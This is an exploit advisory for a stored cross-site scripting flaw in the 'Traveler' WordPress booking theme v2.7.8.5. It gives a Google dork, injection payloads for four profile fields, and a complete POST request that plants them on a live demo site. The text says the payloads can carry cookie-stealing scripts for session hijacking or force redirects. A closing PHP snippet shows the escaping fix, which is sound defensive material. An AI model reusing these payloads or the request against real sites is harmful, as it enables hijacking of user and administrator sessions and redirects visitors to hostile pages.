# Exploit Title: Travel Booking WordPress Theme v2.7.8.5 Persistent XSS
# Google Dork: /wp-content/themes/traveler/
# Date: 11/01/2020
# Exploit Author: m0ze
# Vendor Homepage: https://travelerwp.com/
# Software Link: https://themeforest.net/item/traveler-traveltourbooking-wordpress-theme/10822683
# Version: 2.7.8.5
# Tested on: Kali Linux
# CVE: -
# CWE: 79
----[]- Info: -[]----
Demo website: https://mixmap.travelerwp.com/
PoC Profile: https://mixmap.travelerwp.com/author/m0ze2/
----[]- Persistent XSS -> User Profile: -[]----
The stored payload can carry any cookie-stealing script to hijack a user or administrator session, or force a redirect to a malicious website. Vulnerable input fields: «Paypal Email», «Phone Number» and «Home Airport». Vulnerable textarea: «About Yourself».
Payload Sample (for input): "><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
Payload Sample (for textarea): </textarea><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
PoC:
POST /page-user-setting/?sc=setting&id_user HTTP/1.1
Host: mixmap.travelerwp.com
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------191691572411478
Content-Length: 2210
Origin: https://mixmap.travelerwp.com
Connection: close
Referer: https://mixmap.travelerwp.com/page-user-setting/?sc=setting&id_user
Cookie: _your_cookies_here_
Upgrade-Insecure-Requests: 1
-----------------------------191691572411478
Content-Disposition: form-data; name="st_update_user"
ba1d73a992
-----------------------------191691572411478
Content-Disposition: form-data; name="_wp_http_referer"
/page-user-setting/?sc=setting&id_user
-----------------------------191691572411478
Content-Disposition: form-data; name="id_user"
1672
-----------------------------191691572411478
Content-Disposition: form-data; name="st_paypal_email"
"><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
-----------------------------191691572411478
Content-Disposition: form-data; name="st_email"
asdasd@asdasd.com
-----------------------------191691572411478
Content-Disposition: form-data; name="st_phone"
"><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
-----------------------------191691572411478
Content-Disposition: form-data; name="st_bio"
</textarea><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
-----------------------------191691572411478
Content-Disposition: form-data; name="st_is_check_show_info"
on
-----------------------------191691572411478
Content-Disposition: form-data; name="id_avatar"
10928
-----------------------------191691572411478
Content-Disposition: form-data; name="st_avatar"; filename=""
Content-Type: application/octet-stream
-----------------------------191691572411478
Content-Disposition: form-data; name="st_airport"
"><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>
-----------------------------191691572411478
Content-Disposition: form-data; name="st_province"
-----------------------------191691572411478
Content-Disposition: form-data; name="st_address"
-----------------------------191691572411478
Content-Disposition: form-data; name="st_zip_code"
-----------------------------191691572411478
Content-Disposition: form-data; name="st_city"
-----------------------------191691572411478
Content-Disposition: form-data; name="st_country"
-----------------------------191691572411478
Content-Disposition: form-data; name="st_btn_update"
Save Changes
-----------------------------191691572411478--
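Added illustration, not the theme's code: the advisory does not show the theme source, so the rendering pattern below is an assumption about how the profile fields from the PoC reach the page. It shows the stored values from the PoC echoed raw into an attribute and a textarea, beside the same values rendered with context-appropriate escaping, and counts the tags each rendering produces.

```php
<?php
// Profile values as submitted in the PoC above (the payload strings are the
// advisory's own samples; the phone and airport values are constructed).
$profile = [
    'st_paypal_email' => '"><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>',
    'st_phone'        => '+1 555 0100',
    'st_airport'      => 'LHR',
    'st_bio'          => '</textarea><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;>',
];

// Assumed vulnerable pattern: stored user meta echoed straight into the
// value="" attribute and into the textarea body of the settings form.
function render_unsafe(array $p): string {
    return '<input name="st_paypal_email" value="' . $p['st_paypal_email'] . '">' . "\n"
         . '<textarea name="st_bio">' . $p['st_bio'] . '</textarea>' . "\n";
}

// Hardened form: escape for the context the value lands in. Inside a
// WordPress theme the wrappers are esc_attr() for attribute values and
// esc_textarea() for textarea content; htmlspecialchars() is used here so
// the file runs outside WordPress. Validating on save (sanitize_email(),
// sanitize_text_field()) is a second layer, not a replacement for this.
function esc_html_ctx(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_safe(array $p): string {
    return '<input name="st_paypal_email" value="' . esc_html_ctx($p['st_paypal_email']) . '">' . "\n"
         . '<textarea name="st_bio">' . esc_html_ctx($p['st_bio']) . '</textarea>' . "\n";
}

// Check: count opening tags in the rendered markup. The form itself
// contributes exactly two (<input>, <textarea>); any extra tag means a
// stored value broke out of its attribute or element context.
function count_open_tags(string $html): int {
    return preg_match_all('/<[a-zA-Z]/', $html);
}

echo "unsafe rendering, open tags: ", count_open_tags(render_unsafe($profile)), "\n";
echo "safe rendering, open tags:   ", count_open_tags(render_safe($profile)), "\n";
```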